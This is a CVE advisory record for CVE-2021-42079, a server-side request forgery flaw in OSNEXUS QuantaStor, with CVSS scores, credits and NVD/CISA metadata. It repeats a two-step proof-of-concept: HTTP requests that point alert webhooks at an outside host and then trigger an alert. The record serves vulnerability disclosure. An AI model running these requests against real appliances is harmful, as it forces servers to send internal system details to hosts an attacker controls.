CVE-2021-42079 (GCVE-0-2021-42079)

Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Summary
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: {   ### Python FLASK stuff ####  'endpoint': 'index',   'method': 'POST',   'cookies': ImmutableMultiDict([]),   ### END Python FLASK stuff ####   'data': b'{   "attachments": [    {     "fallback": "[122] test / test.",     "color": "#aa2222",     "title": "[122] test",     "text": "test",     "fields": [        {           "title": "Alert Severity",           "value": "CRITICAL",           "short": false        },  {         "title": "Appliance",           "value": "quantastor (https://<HOSTNAME>)",           "short": true        },  {           "title": "System / Driver / Kernel Ver",           "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",           "short": false        },  {           "title": "System Startup",           "value": "Fri Aug  6 16-02-55 2021",           "short": true         },  {           "title": "SSID",           "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",           "short": true        },     ],     "footer": "QuantaStor Call-home Alert",     "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",     "ts": 1628461774    }   ],   "mrkdwn":true  }',  #### FLASK REQUEST STUFF #####  'headers': {   'Host': '<redacted>',   'User-Agent': 'curl/7.58.0',   'Accept': '*/*',   'Content-Type': 'application/json',   'Content-Length': '790'  },  'args': ImmutableMultiDict([]),  'form': ImmutableMultiDict([]),  'remote_addr': '217.103.63.173',  'path': '/payload/58',  'whois_ip': 'TNF-AS, NL' } #### END FLASK REQUEST STUFF #####
Severity ?
6.2 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N
CWE
  • CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
https://www.wbsec.nl/osnexus third-party-advisorytechnical-description
https://cisrt.divd.nl/DIVD-2021-00020/ third-party-advisoryexploittechnical-description
https://www.osnexus.com/products/software-defined… product
https://csirt.divd.nl/CVE-2021-42079 third-party-advisory
Impacted products
Vendor Product Version
OSNEXUS QuantaStor Affected: 0 , < 6.0.0.355 (semver)
Create a notification for this product.
Credits
Wietse Boonstra (DIVD) Frank Breedijk (DIVD) Victor Pasman (DIVD) Victor Gevers (DIVD) Max van der Horst (DIVD) Célistine Oosting (DIVD)
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T03:22:25.855Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.wbsec.nl/osnexus"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.divd.nl/DIVD-2021-00020"
          },
          {
            "tags": [
              "product",
              "x_transferred"
            ],
            "url": "https://www.osnexus.com/products/software-defined-storage"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-42079"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-42079",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-04T20:06:08.530050Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-04T20:06:17.817Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://www.osnexus.com/downloads",
          "defaultStatus": "unknown",
          "platforms": [
            "Windows",
            "Linux"
          ],
          "product": "QuantaStor",
          "vendor": "OSNEXUS",
          "versions": [
            {
              "lessThan": "6.0.0.355",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Wietse Boonstra (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Frank Breedijk (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Pasman (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Gevers (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Max van der Horst (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "C\u00e9listine Oosting (DIVD)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\nAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\nConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\n\u003cbr\u003eAccept: */*\n\u003cbr\u003eAccept-Language: en\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\u003cbr\u003eConnection: close\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e{\u003cbr\u003e\u2003\n### Python FLASK stuff ####\n\u003cbr\u003e\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\u2003\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\n### END Python FLASK stuff ####\n\u003cbr\u003e\u2003\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\u2003\u2003\"attachments\": [ \u003cbr\u003e\u2003\u2003\u2003{\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"text\": \"test\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"fields\": [ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e)\",\n  \u0026nbsp; \u0026nbsp; \u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u0026nbsp;6 16-02-55 2021\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003     }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003},\u003cbr\u003e\u2003\u2003\u2003\u2003],\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer_icon\": \"\u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"ts\": 1628461774\u003cbr\u003e\u2003\u2003\u2003}\u003cbr\u003e\u2003\u2003], \u003cbr\u003e\u2003\u2003\"mrkdwn\":true \u003cbr\u003e\u2003}\u0027, \u003cbr\u003e\u2003#### FLASK REQUEST STUFF #####\n\u003cbr\u003e\u2003\u0027headers\u0027: {\n\u003cbr\u003e\u2003\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\u003cbr\u003e\u2003}, \u003cbr\u003e\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e"
            }
          ],
          "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by \u003cTARGET\u003e looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \n\u2003\n\u0027method\u0027: \u0027POST\u0027, \n\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n\u0027data\u0027: b\u0027{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n     \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n     \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://\u003cHOSTNAME\u003e)\",\n  \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003     }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}\u0027, \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003\u0027headers\u0027: {\n\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\n\u2003}, \n\u2003\u0027args\u0027: ImmutableMultiDict([]), \n\u2003\u0027form\u0027: ImmutableMultiDict([]), \n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\n}\n\n#### END FLASK REQUEST STUFF #####"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-22T06:40:03.059Z",
        "orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
        "shortName": "DIVD"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory",
            "technical-description"
          ],
          "url": "https://www.wbsec.nl/osnexus"
        },
        {
          "tags": [
            "third-party-advisory",
            "exploit",
            "technical-description"
          ],
          "url": "https://cisrt.divd.nl/DIVD-2021-00020/"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://www.osnexus.com/products/software-defined-storage"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-42079"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
            }
          ],
          "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
    "assignerShortName": "DIVD",
    "cveId": "CVE-2021-42079",
    "datePublished": "2023-07-10T06:29:48.339Z",
    "dateReserved": "2021-10-07T17:12:57.677Z",
    "dateUpdated": "2025-09-22T06:40:03.059Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2021-42079",
      "date": "2026-05-10",
      "epss": "0.00067",
      "percentile": "0.20531"
    },
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"6.0.0.355\", \"matchCriteriaId\": \"5E101217-36C7-4C28-8C61-7744481D2D0E\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\"}]",
      "id": "CVE-2021-42079",
      "lastModified": "2024-11-21T06:27:12.543",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"csirt@divd.nl\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N\", \"baseScore\": 6.2, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 1.7, \"impactScore\": 4.0}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\", \"baseScore\": 4.9, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 3.6}]}",
      "published": "2023-07-10T16:15:47.467",
      "references": "[{\"url\": \"https://cisrt.divd.nl/DIVD-2021-00020/\", \"source\": \"csirt@divd.nl\"}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Product\"]}, {\"url\": \"https://www.wbsec.nl/osnexus\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://www.divd.nl/DIVD-2021-00020\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Product\"]}, {\"url\": \"https://www.wbsec.nl/osnexus\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\"]}]",
      "sourceIdentifier": "csirt@divd.nl",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"csirt@divd.nl\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-918\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-918\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-42079\",\"sourceIdentifier\":\"csirt@divd.nl\",\"published\":\"2023-07-10T16:15:47.467\",\"lastModified\":\"2025-09-22T07:15:38.950\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\\n\\nPOC\\n\\nStep 1: Prepare the SSRF with a request like this:\\n\\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 0\\n\\nStep 2: Trigger this alert with this request\\n\\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\n\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 1\\n\\nThe post request received by \u003cTARGET\u003e looks like this:\\n{\\n\u2003\\n### Python FLASK stuff ####\\n\\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \\n\u2003\\n\u0027method\u0027: \u0027POST\u0027, \\n\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \\n\u2003\\n### END Python FLASK stuff ####\\n\\n\u2003\\n\u0027data\u0027: b\u0027{ \\n\u2003\u2003\\\"attachments\\\": [ \\n\u2003\u2003\u2003{\\n\\n\u2003\u2003\u2003\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"title\\\": \\\"[122] 